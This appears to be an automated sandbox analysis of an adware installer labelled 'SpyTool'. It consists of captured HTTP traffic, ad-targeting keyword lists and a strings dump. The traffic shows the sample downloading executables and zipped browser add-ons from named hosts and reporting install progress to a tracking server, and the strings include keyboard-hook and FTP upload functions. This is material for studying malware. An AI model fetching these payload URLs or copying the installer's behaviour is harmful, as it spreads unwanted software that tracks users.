Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443221190.42548; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xhamster"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":116556}..0..
GET /finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe HTTP/1.1
Connection: Keep-Alive
Host: d22nes4susdva1.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 3030016
Connection: keep-alive
Date: Mon, 24 Aug 2015 06:58:00 GMT
Last-Modified: Mon, 24 Aug 2015 06:48:08 GMT
ETag: "a3078153a7a53bfc0a7a0b8fd20d757a"
Accept-Ranges: bytes
Server: AmazonS3
Age: 69614
X-Cache: Hit from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GQKorADvQepenzx1GtyWuoYr9XO72LsJBKzGeiEXKvES-AOk9YhZXA==
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40693
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop006.fr7.t,1443221125.cds027.fr7.c
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:24 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=7117B4EAD2AE47B1A52740D5241A664B; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=7117B4EAD2AE47B1A52740D5241A664B,1443221184.57749; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: UFBDNmnt6rS4w8afrX4BcyshylNY8tqx53lOZbWuSu6TRAf34ZAscPxtEuOa6INDvkzQJiDohVo=
x-amz-request-id: DB8ACFE45D99CE26
Date: Fri, 25 Sep 2015 22:45:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: c9aH3qj3/n42qjpDqWF2zAldMWFGxU1Uy6ImiwbfmCt/kAOj9jGVV1hcVb6WsP5ZpdGQ32KsZ7k=
x-amz-request-id: F5966C8CC5540619
Date: Fri, 25 Sep 2015 22:45:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tDspsDOXcDyfJ6Go7K F67M/69GeTNGtf8Tadk42VkUfZ8O7Y4pwmwG/ZtGM pyyTfhBTxZOgbY=
x-amz-request-id: B2B2021B6E709490
Date: Fri, 25 Sep 2015 22:45:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tNnPeAT XnTTXoeVwTSoB9leKhoKgD2G3CA/d4hEiu2ZHdTC0KOVYLoy t6gfip0P7WGGF6LkUs=
x-amz-request-id: 927F066C2DCEE3CF
Date: Fri, 25 Sep 2015 22:45:34 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: k2QV8FgigupMMQS Q8QqTLKcKPYpWvV4FTUtDIQK4hd TU4MB27IcmAqpwLyL7VMJg0rkS0ljh4=
x-amz-request-id: 84878FB945610163
Date: Fri, 25 Sep 2015 22:45:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tSvohUTlKbM9 3yR Egr1rOJo7xhmup9qXo/CFXwi4A9YNipBK/Htj Vpv1KOcVCYues03wo6y4=
x-amz-request-id: 225073E7BCEEC1D3
Date: Fri, 25 Sep 2015 22:45:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: pBrZ079IOmdCgJcOGAVpmdcHi/BGPQszqv9XrumvJ3WC6m1ynJ0A1p3oYca5NVj0Gcaw3fRfZyc=
x-amz-request-id: C4D1968177D3D15D
Date: Fri, 25 Sep 2015 22:45:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
Map
The SpyTool connects to the servers at the following location(s):
Strings from Dumps
upgmsd_re_005010096.exe_1276:
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
CNotSupportedException
CCmdTarget
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CHttpConnection
CFtpConnection
CHttpFile
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
portuguese-brazilian
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
%%X
RegSetKeySecurity error! (rc=%lu)
Key not found.
Error opening key.
ntdll.dll
LookupPrivilegeValue error: %u
Error %d: Could not begin update of %s
Error %d: Updating resource
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
PSAPI.DLL
GetProcessHeap
GetWindowsDirectoryW
GetCPInfo
KERNEL32.dll
GetKeyState
SetWindowsHookExW
CreateDialogIndirectParamW
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardState
GetKeyNameTextW
MapVirtualKeyExW
EnumChildWindows
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegSetKeySecurity
RegDeleteKeyW
RegEnumKeyExW
RegQueryInfoKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
UrlUnescapeW
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEACC.dll
InternetCrackUrlW
HttpOpenRequestW
HttpSendRequestW
HttpQueryInfoW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpEndRequestW
HttpSendRequestExW
FtpOpenFileW
FtpCommandW
FtpFindFirstFileW
InternetOpenUrlW
WININET.dll
GdiplusShutdown
gdiplus.dll
IMM32.dll
WINMM.dll